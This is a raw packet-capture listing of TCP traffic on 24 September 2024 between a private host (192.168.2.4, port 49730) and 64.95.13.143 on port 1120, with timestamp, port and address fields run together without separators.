Sep 24, 2024 17:46:11.286983013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.287003994 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.287034035 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.287345886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.287363052 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.287374020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.287389040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.287398100 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.287399054 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.287410975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.287417889 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.287421942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.287446022 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.288069010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.288084030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.288094997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.288105011 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.288111925 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.288127899 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.288217068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.288228989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.288242102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.288255930 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.288274050 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.355777979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.355899096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.355916977 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.356020927 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.356226921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.356239080 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.356256008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.356265068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.356283903 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.356307030 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.380074978 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.380095005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.380106926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.380213022 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.380420923 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.380431890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.380444050 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.380455017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.380530119 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.380530119 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.381392956 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.381403923 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.381421089 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.381434917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.381459951 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.381473064 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.381480932 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.381521940 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.382865906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.382879019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.382889986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.382900000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.382929087 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.382941961 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.383042097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.383053064 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.383071899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.383090973 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.384759903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.384772062 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.384783983 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.384794950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.384807110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.384815931 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.384816885 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.384828091 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.384830952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.384851933 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.384874105 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.385268927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.385288954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.385298967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.385304928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.385338068 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.385421991 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.385425091 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.385462999 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.386562109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.386756897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.386769056 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.386779070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.386809111 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.386828899 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.386924982 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.386939049 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.386949062 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.386981010 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.387413979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.387459993 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.387557030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.387569904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.387582064 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.387593031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.387604952 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.387608051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.387619019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.387634993 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.387659073 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.388468981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388482094 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388498068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388508081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388518095 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388530970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388535976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388541937 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.388566017 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.388787985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388803005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388816118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388832092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388834000 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.388843060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388854980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388864994 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.388870955 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.388902903 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.389331102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.389347076 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.389349937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.389355898 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.389359951 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.389367104 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.389389038 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.389421940 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.389950991 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.389962912 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.389972925 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.389992952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390008926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390019894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390031099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390037060 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.390041113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390053988 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390081882 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.390104055 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.390682936 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390697002 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390707016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390717030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390727997 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.390738964 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390742064 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.390790939 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.390858889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390871048 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390882015 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390892982 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390908003 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.390908957 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.390927076 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.392122984 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.392138004 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.392144918 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.392155886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.392168045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.392190933 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.392224073 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.392963886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.392981052 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.392993927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.393006086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.393065929 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.393457890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.393476963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.393491983 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.393515110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.393531084 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.393541098 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.393572092 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.394160032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.394220114 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.450913906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.450938940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.450951099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.451008081 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.451169014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.451184034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.451196909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.451209068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.451273918 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.451292992 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.475461960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.475481033 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.475492954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.475508928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.475533009 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.475543022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.475563049 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.475574017 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.475579977 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.475599051 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.475620985 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.475894928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.475909948 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.475920916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.475930929 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.475950003 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.475971937 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.476227045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.476238012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.476248026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.476277113 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.476371050 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.476388931 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.476414919 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.476553917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.476568937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.476583004 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.476593971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.476598024 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.476607084 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.476620913 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.476726055 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.476891994 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.477051973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.477062941 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.477072954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.477077961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.477088928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.477103949 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.477130890 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.477178097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.477957010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.477971077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.478003025 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.478112936 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.478123903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.478137970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.478164911 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.478192091 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.478401899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.478413105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.478429079 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.478446960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.478457928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.478466034 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.478468895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.478478909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.478483915 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.478518009 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.479348898 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.479360104 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.479372025 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.479382038 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.479398966 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.479398966 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.479439020 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.479470968 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.480060101 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.480099916 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.480248928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.480282068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.480293989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.480307102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.480318069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.480349064 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.480365038 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.481194973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.481210947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.481224060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.481237888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.481250048 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.481251001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.481266022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.481280088 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.481285095 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.481343985 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.481815100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.481836081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.481898069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.481976986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.481992960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.482023001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.482029915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.482031107 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.482038021 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.482059002 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.482777119 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.482801914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.482824087 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.482908010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.482922077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.482935905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.482944965 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.482949972 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.482963085 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.482971907 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.482975960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.483009100 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.483685017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.483700037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.483712912 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.483726025 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.483728886 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.483740091 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.483755112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.483772039 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.483804941 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.484618902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.484635115 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.484649897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.484664917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.484668970 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.484709024 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.484751940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.484767914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.484781981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.484793901 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.484838963 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.485251904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.485393047 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.485414028 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.485435009 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.485565901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.485580921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.485605001 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.485613108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.485620975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.485652924 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.486263037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.486279964 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.486294031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.486306906 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.486308098 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.486324072 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.486340046 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.486345053 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.486377954 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.486392975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.486429930 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.487097979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.487114906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.487129927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.487144947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.487168074 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.487200975 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.487216949 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.487231970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.487246037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.487272024 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.488225937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.488276005 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.540544987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.540688992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.540699005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.540745020 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.540927887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.540940046 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.540954113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.540966988 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.540996075 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.565825939 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.565865993 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.565871000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.565937042 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.566018105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.566037893 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.566045046 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.566051006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.566095114 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.566531897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.566735029 CEST11204973064.95.13.143192.168.2.4
